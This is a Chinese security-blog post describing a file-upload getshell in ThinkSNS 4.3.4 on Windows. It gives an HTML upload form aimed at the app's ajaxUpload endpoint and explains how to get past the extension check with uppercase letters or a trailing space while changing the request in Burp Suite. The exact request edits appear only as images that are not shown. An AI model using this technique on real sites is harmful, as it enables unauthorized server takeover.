• 投稿邮箱:admin@xssec.org 查看详情
  • 本站教程默认解压密码:666
  • 官方新浪微博:Porry呦
  •    4个月前 (09-16)  漏洞库 |   1 条评论

    相关厂商:http://www.thinksns.com

    这个漏洞只能在windows下使用,因为Linux下的后缀名很严格,所以不能用大写以及加空格来绕过。
    先构造一个上传表单:

    <html><body>

    <form action="http://localhost/thinksns434/index.php?app=public&mod=attach&act=ajaxUpload" method="post" 

    enctype="multipart/form-data">

    <label for="file">Filename:</label>

    <input type="file" name="upfile" id="file" /> <br /><input type="submit" name="submit" value="Submit" /></form>

    </body>

    </html>

    然后呢,随便选择一个php文件,开始上传,同时打开Burpsuite开始抓包改包,其中要更改的地方如下:

    Thinksns前台Getshell

    然后就可以看到回显了上传文件的保存位置了,如图:

    Thinksns前台Getshell

    我们试着访问一下,成功getshell:

    Thinksns前台Getshell

     

    除特别注明外,本站所有文章均为新世纪安全社区原创,转载请注明出处来自http://www.xssec.org/1139.html

    八块腹肌挂腰间,续写另类拳皇篇。

    发表评论

    1. 强大!!

      tzf1003 4个月前 (09-16) [0] [0]
    
    切换注册

    登录

    忘记密码 ?

    您也可以使用第三方帐号快捷登录

    切换登录

    注册

    扫一扫二维码分享